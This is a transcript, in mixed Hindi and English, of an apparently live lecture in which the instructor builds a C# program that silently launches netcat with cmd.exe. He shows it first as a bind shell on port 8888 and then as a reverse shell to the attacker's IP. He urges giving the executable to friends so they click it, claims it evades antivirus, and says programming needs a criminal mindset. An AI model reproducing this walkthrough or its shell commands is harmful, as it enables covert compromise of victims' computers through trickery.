पे हैं, बस हम यूज कर रहे हैं कि मेरी प्रॉब्लम क्या है, मुझे हैकिंग के लिए एक सॉफ्टवेयर बनाना है जो कि लिसन करेगा एक पोर्ट पे और कमांड प्रॉम्प्ट को लिसन करवाएगा। दूसरी डिवाइस से मैं मैन्युअली कनेक्ट कर लूंगा एंड आई विल गेट द शेल। बेसिकली वी आर क्रिएटिंग अ वायरस, यू कैन से। ओके, सो कंसोल एप्लीकेशन बनाते हैं। देखो RDIS वायरस के नाम से बनाता हूं, ठीक है। एंड आई प्रॉमिस, ध्यान से देख लो, दिस इज द वे ऑफ क्रिएटिंग द इजीएस्ट वे ऑफ वायरस। कोई सा भी कंप्यूटर डेफिनेटली यू कैन हैक, अपने फ्रेंड को दे दो, क्लिक करेगा तुम्हारे पास शेल। बट प्रॉब्लम सिर्फ आईपी की जगह पे आपको आएगा, तो यू हैव टू क्लियर योर आईपी कॉन्सेप्ट फर्स्ट। अगर आईपी क्लियर हो गया तो दिस इज द परफेक्ट वायरस यू कैन गेट द कनेक्टिविटी फ्रॉम। द सेकेंड इंपॉर्टेंट थिंग इज इट इज नॉट गोइंग टू बी डिटेक्टेड बाई एनी ऑफ द एंटीवायरस, ठीक है। तो ये बेस्ट पार्ट ये है। चलो देखते हैं। सो आई हैव अ कंसोल प्रोग्राम अवेलेबल, ठीक है। सबसे पहली जरूरी चीज क्या है, मैंने तुम्हें कहा था हमारे पास प्रॉब्लम है, हम बड़े ही परेशान लोग हैं, है ना, हमारे को बहुत दुख है, हमको उस दुख को दूर करना है। दुख को दूर क्या करना है, मुझे किसी का सिस्टम हैक करना है, सिंपल, ठीक है। अब देखो, तो मैंने क्या किया, मैंने पैकेजेस उठाए। सबसे पहले मैंने चूज किया .NET, क्योंकि विंडोज का सिस्टम है, उधर विंडोज हैक करवानी है, मेरा दोस्त चलाएगा, मेरे पास शेल आ जाएगा। अब प्रॉब्लम मिली, विजुअल स्टूडियो मिल गया। विजुअल स्टूडियो के अंदर मुझको क्या मिल गए, पैकेजेस, ठीक है। पैकेजेस के अंदर क्या होता है, क्लासेस। ओके, ये सब कैसे होती हैं, वील लर्न दिस पर्टिकुलर थिंग इन .NET फ्रेमवर्क। अभी मैं जस्ट आपको अवेयर करवा रहा हूं, बेसिक क्लास नहीं है, जस्ट अ स्टेप अहेड, 1+1 का क्लास है, ठीक है ना। पहले बेसिक पढ़ने के बाद जो अगले दिन होता है ना, वो वाला करवा रहा हूं अभी। बेसिक कैसे होगा देखेंगे प्रॉपर। So we have a class and inside the class we have methods. The most important part in any of the programming languages, we need the first method which will be executed as soon as the program runs. Okay. So in object oriented we have main methods. .NET basis के ऊपर C# है ये। C# पे जो method available है हमारे पास, it is public static void main, sorry, static void main. Okay. ठीक है ना। Main is the method which will be executed. Whatever codes which are written inside the main method, that will only be executed. उसके अलावा कुछ भी execute नहीं होगा। मेरी आवाज ठीक आ रही है ना सबका? Okay, so let's see. आ गई मेरी डिवाइस। वाह, पहले तो मैं सोच रहा था लेट ना हो जाओ। रख दो। अब आप लोगों को मजा आएगा। फाइनली नो टच जेस्चर, यू विल हैव अ लुक। ओके, हाँ, व्हाट जेस्चर? It's not, basically you can say gesture, you can say it as facial as well, you can so no issues। आओ जी आओ, नहीं सही कह रहे हो आप, it is the exact answer, no issues। so let's see क्या करना है हमको करना है वायरस बनाना है। तो वायरस बनाने के लिए जो मेरा प्रोग्राम प्रॉब्लम था, उसके लिए मुझको क्या चाहिए, एक क्लास चाहिए, ठीक है। क्लास कौन सी है, देयर इज अ क्लास नेम है सिस्टम, ठीक है। कैसे किया मैंने, कैसे पता चली क्लास, मैंने गूगल पे डाला हाउ टू एग्जीक्यूट सिस्टम कमांड्स ऑन विजुअल स्टूडियो, मुझको मिल गया, ठीक है। ऐसे ही किया था मैंने भी, आपको भी ऐसे ही करना है, क्योंकि पहले क्या है, रिक्वायरमेंट की वायरस बनाना है। वायरस बनाने के लिए गूगल पे डाला, गूगल ने बता दी क्लास का नाम, अब उस क्लास के नाम से हम मेथड्स को यूज करेंगे। तो देखो, सिस्टम के अंदर, सिस्टम पैकेज के अंदर एक डायग्नोस्टिक्स नाम का, ये सबको दिख रहा है, या मुझको थोड़ा इसका साइज बढ़ाना चाहिए ना, सबको वायरस बनाना है, ठीक है। क्या यूज किया मैंने, सिस्टम पैकेज के अंदर डायग्नोस्टिक्स के अंदर एक प्रोसेस है, क्योंकि सिस्टम के अंदर क्या चलते हैं, प्रोसेसेस चलते हैं, एवरीबॉडी इज अवेयर। प्रोसेस के अंदर क्या चलेगा, वायरस का प्रोग्राम चलेगा, है ना। वायरस के प्रोग्राम के अंदर क्या चलेगा, जो कमांड हमने मैन्युअली चलाई थी वो ऑटोमेटिकली चलेंगी, ठीक है। कैसे चलेंगी, एक बार में तो यूजर को दिखेगा कि हैक हो गया, ताकि हम लोग देख सकें कि हुआ भी या नहीं हुआ। दूसरे में पीछे छुप के चलेंगी, ताकि किसी को पता भी ना चले कि क्या हो गया मेरे सिस्टम में, ठीक है ना। चलो देखो, तो सिस्टम डायग्नोस्टिक्स, इसके बाद मेरे पास क्या है, आई हैव अ प्रोसेस, ठीक है। मैंने क्या यूज किया, मैं एक क्लास बना रहा हूं, ठीक है। उस क्लास का ऑब्जेक्ट डिफाइन कर रहा हूं। जो जनरल मेथोडोलॉजी है, जनरल मेथोडोलॉजी ये कहती है क्लास नेम ऑब्जेक्ट नेम इक्वल न्यू क्लास,
ठीक है, ये होता है प्रोग्रामिंग का सीधा फंडा, बस ऑब्जेक्ट बनाने का तरीका। एक बार ऑब्जेक्ट बन गया तो उसके सारे मेथड्स को हम यूज कर सकते हैं। कैसे यूज कर सकते हैं? ऐसे, ऑब्जेक्ट नेम डॉट मेथड। ठीक बात है। जावा में भी यही तरीका है, C#.NET में भी यही तरीका है, C++ में तरीका थोड़ा सा अलग है, C में तरीका थोड़ा सा अलग है, ठीक है ना, क्योंकि वो कौन सी लैंग्वेजेस थी? प्रोसीजरल, और ये कौन सी है? ऑब्जेक्ट ओरिएंटेड, ठीक है ना। सो बट द बेसिक आइडिया इज जो नए फ्रेमवर्क्स हैं दे हैव द एडेड मॉड्यूल्स फॉर ऑब्जेक्ट ओरिएंटेड एंड वी शुड गो फॉर ऑब्जेक्ट ओरिएंटेड प्रोग्रामिंग बिकॉज इट इज इजी टू डेवलप प्रोग्राम्स ऑन ऑब्जेक्ट ओरिएंटेड, ठीक है ना। तो यही दो कॉन्सेप्ट सिर्फ मन में बिठा लेने हैं। भाई ये कौन बताएगा? गूगल बता देगा। ये तो मैं खुद बनाता हूं, कैटरीना कैफ भी नाम रख सकता हूं इसका, तो है ना। फिर नई वो वाली क्लास जो हमें गूगल से मिली, ठीक है। मेथड्स कैसे डिफाइन होंगे? लाइब्रेरीज पढ़ूंगा इसकी, मुझको उसके अंदर के मेथड मिल जाएंगे कि कौन सा प्रोग्राम क्या काम करता है। जो असली मेथोडोलॉजी अच्छे वाले प्रोग्रामर्स यूज करते हैं वो क्या करते हैं? कोई सी भी एप्लीकेशन उठाई, उसको हैक किया, उसका कोड रिट्रीव कर लिया, वहां से क्लासेस के नाम और मेथड्स के नाम चुरा लिए और अपनी एप्लीकेशन में डाल के रीबिल्ड कर दिया। दैट इज द जनरल मेथोडोलॉजी विच इज यूज्ड इन द कॉर्पोरेट सोसाइटी, ठीक है। पर पेज एक सॉफ्टवेयर बनता है, 80,000 रुपया कॉस्ट है हर एक पेज का। आपने सॉफ्टवेयर बनाया, 1 2 3 4 5 जितने भी पेजेस बनाए, हर पेज का 80,000 रुपए बाहर की डेट पे प्रोजेक्ट बन रहे हैं। और अगर सरकार को अगर आप बेचोगे, यानी गवर्नमेंट ऑफ इंडिया, तो वो प्राइसेस और भी ऊपर है, ठीक है। तो द जनरल सॉफ्टवेयर डेवलपमेंट मेथोडोलॉजी एंड व्हाट द पीपल आर यूजिंग, दे आर जस्ट डिकोडिंग द programs available, they are modifying the codes and rebuilding the codes, okay. What they only know, they have a better idea to find the exact classes which are available, okay. ठीक है, तो पहले अभी हमें क्या करना है, ये याद कर लिया, बस इसको अप्लाई करते रहना है हर जगह पे, ठीक है। तो क्या बना रहा हूं मैं? एक ऑब्जेक्ट बना रहा हूं अपने प्रोग्रामिंग में। ये फंडा सबको क्लियर है? कोई भी ऐसा बच्चा है जिसको पता नहीं चला या समझ में नहीं आया या जिसने ध्यान नहीं दिया? हाँ, सबने ध्यान दिया है? पूछूंगा तो बताओगे? चलो ठीक है, लास्ट में पूछूंगा। आई डिस्ट्रीब्यूट चॉकलेट्स एज वेल देन, ओके। लड़कियां तो बता ही देंगी इस बात पे। चलो ठीक है, देखते हैं। सो हियर वी आर। तो ये क्या है? आई एम क्रिएटिंग अ प्रोसेस, इनसाइड द प्रोसेस आई एम राइटिंग अ कमांड, दैट कमांड विल मेक अ सर्वर लिस्टिंग एंड आई विल गेट द शेल। दैट इज द मेन आइडिया, ओके। सो दिस इज द नेम ऑफ द क्लास। लेट्स मेक अ ऑब्जेक्ट। ऑब्जेक्ट का नाम मैंने ऑब्जेक्ट दे दिया, ठीक है। इक्वल क्या किया? नई बनाई। जनरल सिंटेक्स क्या है? सिस्टम डॉट डायग्नोस्टिक डॉट प्रोसेस, ठीक है। अच्छा, ऑब्जेक्ट नहीं यूज कर सकता हूं मैं, इसका नाम कर देता हूं प्रोसेस, ठीक है। ठीक बात है, मैंने इसका नाम प्रोसेस कर दिया, ठीक है। तो क्या है? क्लास नेम, क्लास का ऑब्जेक्ट एंड द न्यू क्लास। अब क्या करने हैं? इसके मेथड्स यूज करने हैं सिंपली। नाउ लेट्स सी कैसे मेथड्स यूज करेंगे। मेथड्स ऐसे यूज कर लेंगे। मैं थोड़ा सा इसको बड़ा कर लेता हूं। ठीक है, सबको दिख रहा है ना? अब देखो क्या करना है। वी नीड टू एग्जीक्यूट दैट पर्टिकुलर प्रोग्राम। प्रोसेस डॉट स्टार्ट इन्फो एक मेथड है प्रोसेस ऑब्जेक्ट के थ्रू। ये जो स्टार्ट इन्फो मेथड है, ये मैंने कहां से कॉल किया है? ये कॉल किया है डायग्नोस्टिक के प्रोसेस में से। कैसे कॉल किया है? इस प्रोसेस के थ्रू, ठीक है। क्लियर है सबको? तो प्रोसेस डॉट जैसे लिखा, मेरे पास सारे फंक्शंस आ गए जो यूज कर सकता हूं। तो दैट आई एम यूजिंग द स्टार्ट इन्फो। स्टार्ट इन्फो के अंदर फाइल नेम, ठीक है। ये क्या कर रहा है? मैं प्रोसेस में से इसका एक मेथड निकाल रहा हूं जो कि एक फाइल नेम को एग्जीक्यूट करवाएगा। दैट फाइल शुड बी अवेलेबल ऑन द विंडोज सिस्टम, ओके। मैनुअली नहीं कर रहे हैं इस बार, प्रोग्रामेटिकली कर रहे हैं इस काम को। चलो, तो क्या है वो फाइल नेम? वी हैव टू डिफाइन इट, ओके। द फाइल नेम इज nc.js,
exe, ठीक है। nc.exe चलाया था हमने मैनुअली, तो अभी हमने क्या किया, डायग्नोस्टिक प्रोसेस का एक प्रोसेस बना दिया nc.exe, ओके। अब देखो क्या करते हैं, इंटरफेस के साथ में हमने क्या दिए थे, आर्ग्यूमेंट्स दिए थे मेरे ख्याल में। आर्ग्यूमेंट्स कौन से थे, -lvp, पोर्ट नंबर एंड बाइंडेड द शेल, ठीक है, यही काम किया था। उसको कर लेते हैं मैनुअली। कैसे करेंगे, प्रोसेस यूज किया, प्रोसेस का कौन सा फंक्शन, स्टार्ट इन्फो, स्टार्ट इन्फो का कौन सा, आर्ग्यूमेंट्स, ओके, विजिबल है सबको। आर्ग्यूमेंट्स यूज किया, आर्ग्यूमेंट्स में क्या है हमारे पास, -lvp, क्या मतलब है -lvp का, पोर्ट नंबर। अब पोर्ट नंबर डिफाइन करना है, कौन सा डिफाइन करूं, इस बार 8888 कर देता हूं यार, है ना, हमको क्या मतलब है, हम तो कोई सा भी यूज कर सकते हैं, हम तो हीरो है ना, ठीक है, बिकॉज वी कैन यूज एनी ऑफ द 65,535 पोर्ट्स, ओके। यस प्लीज, वी कैन अपलोड इट यूजिंग अवर सॉफ्टवेयर, हम अपने साथ में उसको भी बाइंड कर सकते हैं, उसके भी कोड को, बिकॉज आई सेड इन द स्टार्टिंग इट इज ओपन सोर्स, ठीक है ना, और इसकी भी सर्विसेज एंड नेटवर्किंग है जिसके थ्रू डायरेक्टली चला सकते हैं, ठीक है। तो देखो, सो जनरल मेथोडोलॉजी अभी हम यूज कर रहे हैं, ठीक है ना। तो पोर्ट लिसन करवा लिया, और क्या करना है, एग्जीक्यूट करवा देना है क्या, cmd.exe, ठीक है। ये काम हमने मैनुअली किया था वहां पे, सही लग रहा है, कोई दिक्कत नहीं है ना, दिक्कत कौन से टाइप का प्रोग्राम है, कंसोल बेस्ड, ठीक है। अब क्या करना है, अब हमें इस प्रोसेस को स्टार्ट कर देना है, दैट्स इट। जैसे ही वो प्रोसेस स्टार्ट हो जाएगा, मेरा वायरस चलना शुरू हो जाएगा, ठीक है। तो मैंने क्या किया, क्लास यूज करी, क्लास का ऑब्जेक्ट बनाया, ऑब्जेक्ट यूज करके उसको एक फाइल नेम दिया, वो फाइल नेम को आर्ग्यूमेंट्स दिए और उस फाइल को चला दिया, ठीक है, सिंपल, बन गया वायरस। क्या करना है, अब इसको रन करना है, काम खत्म हो जाएगा मेरा। साथ में अगर बाइंड करके दे देता हूं वही nc.exe किसी को, तो साथ में तो जाएगी ना एज ए पैकेज, जैसे ही क्लिक करेगा दाएं शेल हमारे पास, ठीक है ना। चलो देखते हैं क्या होता है। तो प्रोसेस डॉट स्टार्ट, इसको करते हैं, देखते हैं। 88 नाम का कोई भी पोर्ट अभी मेरे पास लिसनिंग नहीं है। देखो क्या करना है, मुझको मैग्नीफायर पहले थोड़ा छोटा करता हूं, ठीक है। नाउ ये क्या किया हमने, कोड किया, कोड हमने कहां डिफाइन किया, एक मेन मेथड में। वो मेन मेथड कौन सा है, एक प्रोग्राम के अंदर है। ये प्रोग्राम का नेम स्पेस कौन सा है, rdias वायरस। किसने बनाया है, हमने बनाया है, ठीक है ना। हमारे इस मेथड को कोई दूसरा प्रोग्रामर भी यूज कर सकता है अगर हम उसे अपना कोड दे दें तो, ठीक बात है, क्लियर। चलो देखो क्या करना है, सॉफ्टवेयर बन गया। कभी सोचा इतनी जल्दी बन सकता है, 4 लाइन की कोड है। सारे अच्छे सॉफ्टवेयर छोटे छोटे होते हैं हमेशा, ज्यादा बड़ा प्रोग्राम इज नेवर फाइन। चलो लेट्स सी क्या करते हैं। अब विजुअल स्टूडियो चलाया, कोड लिख दिया, ऑब्जेक्टिव था हमारे पास, सॉफ्टवेयर बनाना है फाइनली, ठीक है। दिस मीन्स वी हैव टू रिलीज अ .exe फाइल, दैट इज द मोस्ट इंपॉर्टेंट पार्ट। तो लेट्स सी, अब देखो क्या करेंगे हम इसको। आई हैव एन ऑप्शन हियर, बिल्ड, ओके। क्या कर रहे हैं, सोल्यूशन बिल्ड कर रहे हैं। बिल्ड करने के लिए सबसे पहले तो मैं कॉन्फ़िगरेशन मैनेजर में जाता हूं। नोट करना चाहें वो लोग नोट कर लो। आई एम गोइंग टू कॉन्फ़िगरेशन मैनेजर, नोट कर लिया। कॉन्फ़िगरेशन मैनेजर में जाके यहां पे सोल्यूशन के 2 कॉन्फ़िगरेशन है। वन इज डीबग मोड, ये दिख रहा है या मैं लिखूं, नोटपैड पे लिख देता हूं। सोल्यूशन से डिस्ट्रीब्यूशन, डिस्ट्रीब्यूशन इज द इंपॉर्टेंट पार्ट। डिस्ट्रीब्यूशन जैसे कि हम लोग दूसरों को दे सकें स्टैंड अलोन फाइल, ताकि उनको सिर्फ क्लिक करके वो चला सकें, ठीक है ना। तो 2 टाइप के हैं, एक तो डीबग, एक रिलीज, ठीक है। रिलीज क्या होता है, फाइनल कोड जो स्टैंड अलोन एकदम रेडीमेड फाइल होती है, बस चलानी है। और डीबग क्या है कि द फाइल इज करेंटली इन प्रोग्रेस, इट इज ऑल्सो एन exe फाइल, बट तब तक वो प्रोजेक्ट कहां होता है, डेवलपमेंट फेज पे होता है। तो हम डीबग रिलीज करते हैं, ठीक है ना। इट मस्ट बी डीबग्ड एंड द नेक्स्ट पार्ट इज वी गो फॉर रिलीज फंक्शनैलिटी, ओके। सो अभी हम रिलीज वाला देखते हैं, डीबग देखते हैं, दोनों एक ही बात है, बराबर है। ऑप्शन कैसे सेलेक्ट कर सकते हैं, आइदर डीबग और यू कैन गो फॉर रिलीज, ठीक है। चेंज करेंगे यहां से rdias वायरस को इनटू द रिलीज वर्जन,
दिख रहे हैं? क्या किया मैंने, जो मेरा RDAS प्रोजेक्ट है उसको कॉन्फ़िगरेशन कर दिया रिलीज, ओके, सीपीयू के लिए। अगर स्पेसिफाई करना होता कि सिर्फ विंडोज 8 पे चले या विंडोज 7 पे चले या विंडोज 6 पे चले, हो ही नहीं विंडोज 6 तो, है ना, विंडोज विस्टा तो है, विंडोज विस्टा पे चले, तो इस हिसाब से हम सीपीयू को यानी प्लेटफॉर्म को कॉन्फ़िगर भी कर सकते हैं डिपेंडिंग ऑन .NET। कभी सोचा है जो विंडोज 7 के लिए प्रोग्राम्स आते हैं वो विंडोज 8 पे नहीं चलते हैं, है ना, ऐसा होता है कई बार, विंडोज XP पे नहीं चलते जो विंडोज 8 का। अगर कभी आपको उसका सोर्स कोड मिल जाए तो क्या करना है आपको, यू हैव टू चेंज द प्लेटफॉर्म, ओके। जैसे प्लेटफॉर्म चेंज करोगे अपने आप चलने लगेगा। तो जो ये पैचेस आते हैं, चीजें आती हैं, ये सब यही काम करते हैं मैनुअली, बिकॉज दे ओनली नो वन स्टेप एक्स्ट्रा फ्रॉम यू गाइज, ठीक है, क्योंकि वो कैसे सोचते हैं, वो गूगल की क्रिएटिविटी के थ्रू सोचते हैं ये काम कैसे होगा। सो ऑब्जेक्टिव इज द इंपॉर्टेंट पार्ट। वी कैन नॉट लर्न प्रोग्रामिंग अंटिल वी हैव सम से मलिशियस ऑब्जेक्टिव। जब तक कुछ वो क्रिमिनल माइंडेड नहीं होंगे ना, तब तक प्रोग्रामिंग आती नहीं है। तो जब क्रिमिनल माइंड बनोगे फिर उसके बाद में गुड माइंड भी बन जाओगे धीरे धीरे, ठीक है ना। सो लेट्स सी, तो रिलीज पे करते हैं, क्योंकि देखो मैं बताता हूं, सब लोग कभी ना कभी छोटे तो हो गए, है ना। छोटे में क्या होता है, कभी कभी ना शौक लगता है, जैसे लड़कियों का तो पता नहीं मुझे, लेकिन लड़कों को ना पैसे कमाने का शौक लगता है। हुआ है किसी के साथ? तो वो क्या करते हैं ना, गलत रास्ते ही ढूंढते हैं हमेशा, क्योंकि सही रास्ते तो कर नहीं सकते ना, मम्मी पापा तो मना ही करेंगे। व्हाट दे डू, वो मम्मी के जेब से निकाल लिया, पापा के जेब से निकाल लिया ऐसे करते हैं ना। तो ऑब्जेक्टिव हमेशा शुरू होता है गलत तरीके से ही, और फिर वो डिफाइंड हो जाता है कि वेयर वी नीड टू गो डिपेंडिंग ऑन द अपॉर्चुनिटीज यू गेट, एंड यू कैन गेट द अपॉर्चुनिटीज ओनली व्हेन यू आर लुकिंग फॉर द अपॉर्चुनिटीज। इफ यू आर वेटिंग फॉर एन अपॉर्चुनिटी यू विल नेवर गेट एनीथिंग, ओके। सो दैट इज द इंपॉर्टेंट पार्ट। तो उसी तरीके से भी प्रोग्रामिंग करने के लिए, कुछ भी अचीव करने के लिए हमको आगे जाना पड़ेगा, सर्च करना पड़ेगा, अपने आप कभी नहीं आएगा, ठीक है ना। तो सर्च करने के लिए द बेस्ट थिंग इज गूगल सर्च इंजन, ठीक है ना। डोंट रीड पैकेजेस, इतने सारे 500 कोई थोड़ी खेलता है। हम क्या करो, जो भी सॉफ्टवेयर बनाना बस उसको डाउनलोड कर लो और हैकिंग का तरीका सीख लो। जैसे ही हैकिंग मिल जाएगी, उसका कोड मिल जाएगा, रीबिल्ड इट। दैट इज द एग्जैक्ट वे टू डेवलप गुड सॉफ्टवेयर, और हर जगह ऐसा ही होता है, ठीक है। देखो तो क्या किया, रिलीज के लिए किया। नाउ व्हाट आई वांट, जस्ट बिल्ड द सोल्यूशन, ठीक है ना। बिल्ड कर रहा हूं सोल्यूशन। बेसिकली ये जो मेरा पर्टिकुलर सब कुछ है ये अवेलेबल है यहाँ पे सी ड्राइव में, डॉक्यूमेंट्स में विजुअल स्टूडियो 2008, विजुअल स्टूडियो में प्रोजेक्ट्स के अंदर RDAS वायरस, ठीक है। RDAS वायरस के अंदर अभी मेरे पास एक बिन है, OBJ है, प्रॉपर्टीज हैं, ठीक है ना। बिन का क्या कोई मतलब समझता है? व्हाट एग्जैक्टली BIN बिन इज? हाँ, बाइनरी। Binary is the thing which runs on the system. The executables, either it is on Linux or it is on Windows. The binary file always executes. ठीक है ना, जो runnable file होती है वो binary होती है. Okay, so let's see the binary. यहाँ पे दो ऑप्शन है हमारे पास, release and debug. Release के अंदर I have RDAS virus vhost.exe. अभी मैंने इसे build नहीं किया है, इसीलिए ये vhost डिस्प्ले कर रहा है. I'll build it. इसको build करता हूं मैं, ठीक है ना. देखो क्या होगा, let's go here, build and build the solution. Okay, build क्या solution? Here inside the console window, अरे यार देखो यहां पे इसने मुझको बताया कि कंपाइल हुआ मेरा प्रोग्राम, और कंपाइल होके क्या बन गया, सी यूजर्स हैकवेज विजुअल स्टूडियो प्रोजेक्ट्स RDAS वायरस के अंदर, रिलीज के अंदर एक RDAS virus.exe बन गई. What happened? क्या हो गया? हाँ ठीक है, देखो देखो मजाक मत करो, क्या हो गया देखो. So what exactly we got here? We got a RDAS virus.exe. Now what this means, हमारा एक सॉफ्टवेयर तैयार हो गया, ठीक है ना. We just have to execute this particular file and we'll get the shell. ठीक है, चेक करते हैं मेरे पास क्या था. मैं जस्ट इसको कॉपी कर लेता हूं और बाहर वाले RDAS वाले फोल्डर में ले जाता हूं.
ठीक है, मैं इसको फेसबुक पे अपने पेज पे आज की जो भी फाइल्स होंगी सब अपलोड कर दूंगा. यू ऑल कैन गेट द कोड्स एंड एवरीथिंग फ्रॉम देयर. ठीक है, अगर किसी को चलाने हो, घर पे जाके वायरस टेस्ट करने हो, तो यू कैन गेट द फाइल्स फ्रॉम देयर. ओके, इट इज फ्री, इट्स नॉट अ प्रॉब्लम. हाँ, आईडी आई विल टेल, डोंट वरी. अभी नहीं जा रहा हूं यार, अभी हूं 1-2 घंटे. ठीक है. क्या हो गया, देखो rdas-virus.exe आ गया मेरे पास. नाउ द इंपॉर्टेंट थिंग इज, अभी ये रन तो हो नहीं रहा है, दिखेगा वैसे आप लोगों को क्योंकि ये तो कंसोल है ना. पोर्ट नंबर कौन सा डिफाइन किया था यहाँ पे, 8888. CMD कौन सा था, चलाया था ना CMD. देखो सबसे पहले हम अपना क्लाइंट बेचारे को भी जगा लेते हैं, भूल ना जाए ना ये कि इसको भी काम करना है. अभी चल रहा है ना. अबे तुम्हारे पास अभी भी शेल है. क्लोज. ठीक है, देखो. सो बेसिकली नाउ व्हाट आई एम डूइंग, सबसे पहले हम क्या चेक कर रहे हैं, अपना रैंडम पोर्ट चेक कर रहे हैं. देखो क्या कर रहे हैं, नेट स्टार्ट से चेक करते हैं द पोर्ट नंबर, जो पोर्ट नंबर हमने स्टार्ट करना है. नेट स्टार्ट -an फाइन स्ट्रिंग. उस लंबी लिस्ट में से मैं ढूंढ रहा हूं कि क्या 8888 करके कोई स्ट्रिंग है मेरे पास अवेलेबल. पोर्ट हमने 8888 बनाया था ना. एंटर करके देखा, अभी यहां पे कुछ भी लिसनिंग नहीं है. ठीक है, तो यानी क्लिक करना पड़ेगा, अपना सर्वर बनाना पड़ेगा. तो जनरली आई हैव गिवन अ फाइल टू अ फ्रेंड. द फाइल इज हियर, rdas-virus.exe. simply click the particular file and I got something. ओके, क्लिक किया उसको virus.exe को एंड आई हैव अ सर्वर लिसनिंग. अभी आप लोगों को दिख रहा है, ठीक है ना, क्योंकि मैं दिखा रहा हूं. जब नहीं दिखाऊंगा तो नहीं दिखेगा. देखो, अरे देख लो. देखो, तो हमने क्या किया था, ये वाला कमांड फिर से एग्जीक्यूट करते हैं. तो क्या हो गया, नाउ द फाइल इज लिसनिंग, लिसन कर रही है ना. अभी ना बेचारे यूजर को दिख रही है कि उसका बनाया जा रहा है. यही क्रिएटिविटी चाहिए प्रोग्रामिंग में भी. ठीक है, चलो देखो, अरे देख लो. ठीक है ना, लिसन करने लग गया. हियर आई एम, यहां पे हूं, बैटरी जा रही है यार मेरे फोन की. शिट. देखो, तो क्या करना है, जस्ट अब इस बार यहां से जाएंगे NC 192.168.43.43. ठीक है, और पोर्ट क्या है, 8888. नाउ द बेसिक आइडिया इज, अगर मुझे किसी यूजर का IP एड्रेस मिल गया और मैंने उसको वायरस दे दिया, वायरस एक पोर्ट चला देगा. IP मुझे पता था, मैं उसके IP को उस पोर्ट के ऊपर कनेक्ट कर लूंगा एंड आई विल गेट द शेल. क्योंकि वायरस बनाया किसने, मैंने. ठीक है ना, सर्वर का एड्रेस किसका है, मेरा. मुझे पता है अगर मुझे रिवर्स शेल लाना होगा तो मुझे मेरा एड्रेस, मुझे दूसरे के एड्रेस से कोई मतलब नहीं है जनरली. ठीक है ना, अगर मेरा प्राइवेट पब्लिक नेटवर्क के ऊपर मेरा डिवाइस है तो आई कैन गेट द कनेक्शन फ्रॉम एनी ऑफ द कंप्यूटर विदाउट नोइंग द IP एड्रेस ऑफ द अदर पर्सन. ही ओनली हैव टू क्लिक हिज फाइल वंस. जैसे ही क्लिक होगा यू विल गेट कॉम्प्रोमाइज, ही विल गेट कॉम्प्रोमाइज. ठीक है ना, चलो देखो, तो हियर इट इज. जो दूसरा मेरा शेल चल रहा है वो यहां पे है ना, और नेटकैट कहां पे है बेचारा, यहां पे है. कहां गया. ठीक है, एंटर करूं. Here it is listening and here we are on 8888. I just pressed enter. Let's see if we get the connection here. I have got the connection right here. Okay, and I have got the CRDS shell here. Okay, it is fine. सर्वर का डाला है अभी. ठीक है ना, रिवर्स शेल क्या होता है वो भी देखते हैं. ठीक है ना, व्हाट एग्जैक्टली रिवर्स शेल इज. रिवर्स शेल में क्या होता है, अटैकर खुद का सर्वर बनाता है और अपना ही सर्वर उसके
क्लाइंट की डिवाइस के ऊपर स्पेसिफाई करता है। देखोगे कैसे? देखो हमारा यही सोल्यूशन है। इस बार हम क्या करने जा रहे हैं? रिवर्स शेल, कि क्लाइंट का आईपी की हमको कोई भी जरूरत नहीं पड़े। देखो कैसे होता है रिवर्स शेल, ध्यान से देख रहे हैं ना सब लोग? रिवर्स शेल किसी को नहीं दिख रहा है तो मुझे बताओ, बिकॉज दिस इज एन इंपॉर्टेंट कॉन्सेप्ट। यू विल डेफिनेटली, चाहे आप प्रोग्रामिंग फील्ड में हो या नहीं हो, लेकिन द काइंड ऑफ दीज टाइप्स ऑफ एप्लीकेशंस समटाइम्स यू विल नीड डेफिनेटली, एंड आई कैन अश्योर यू। क्यों ऐसा? क्योंकि आगे जो कंप्यूटिंग होने जा रही है, आगे जो कंप्यूटिंग बढ़ रही है, until you are quite say one step ahead, you cannot make it up to the mark. Okay, that is the important part. अब देखो क्या करना है, we are just getting the reverse shell. रिवर्स शेल करने के लिए क्या चाहिए हमको? VNC को यहां से अभी स्टॉप कर दिया, ठीक है ना, एग्जिट, ठीक है, यहां से हटा दिया। दिस इज माई एंड्रॉइड डिवाइस एंड दिस इज एन अटैकर, अटैकर है, दिस इज अटैकर, ठीक बात है, क्लियर? क्या करना है? सिंपली सर्वर बनाना है, -L-P, यानी अब मैं लाइनेक्स को सर्वर बना रहा हूं, ठीक है। पोर्ट नंबर से इस बार 8888 यहां पे कर देता हूं, ठीक है ना, क्लियर बात है। NC-L-P 8888, सिंपल, काम खत्म, एंटर कर दिया, लिसन होने लग गया, एक पोर्ट 8888। अब यहां आया अपने वायरस की जगह पे, यहां पे क्या करूंगा? लिसन करवाने के बजाय इस बाबू को कनेक्ट करवाऊंगा। तो कनेक्ट करवाने के लिए क्या करना पड़ेगा? वर्बोस, नहीं गया ये, ठीक है, -V, अपना आईपी एड्रेस, अटैकर का आईपी एड्रेस तो मुझे पता है, आईपी कॉन्फ़िग देख के करके चेक कर सकता हूं, 192.168.43.1, ये है मेरा आईपी एड्रेस। पोर्ट नंबर मेरे सिस्टम पे कौन सा लिसन हो रहा है? 8888, ये भी देख सकता हूं, ठीक है ना। -E क्या है? cmd.exe, ये भी ठीक बात है ना, कर दूं। जैसे ही अब ये क्या करेगा, जैसे ये वायरस चलेगा, ये अपने सिस्टम से कनेक्शन भेजेगा अटैकर के आईपी एड्रेस को उसके एक लिसनर के ऊपर, जो 8888 लिसनर है, और अपना कमांड प्रॉम्प्ट भेज देगा किसको? अटैकर को। दिस इज द रियल टाइप ऑफ वायरस विच इज एग्जीक्यूटेड। अब इसमें क्या है, हमें किसी भी अटैकर की या विक्टिम के आईपी एड्रेस की जरूरत नहीं है, हमें सिर्फ उसको फाइल दे देनी है प्यार से। दोस्त लो फेसबुक हैकर, फेसबुक हैकर कितने लोगों ने डाउनलोड किया है? कभी किसी ने कहीं भी अनहोनी घटना किसी के साथ? नहीं। देखो, नेवर डाउनलोड एनी काइंड ऑफ एग्जीक्यूटेबल्स व्हेन समबडी इज गिविंग यू और प्रोवाइडिंग यू, कभी भी नहीं लेना, हमेशा वायरस होता है, ठीक है ना, और कॉम्प्रोमाइज हो सकते हो। और फेसबुक हैकर, देयर इज नो सच काइंड ऑफ थिंग नोन एज फेसबुक हैकर। कभी भरोसा भी मत करना ऐसा कि कोई फेसबुक हैकर भी है, ओहो बहुत बड़ी दुनिया में हैकर हैं और फेसबुक, देयर इज नो काइंड ऑफ 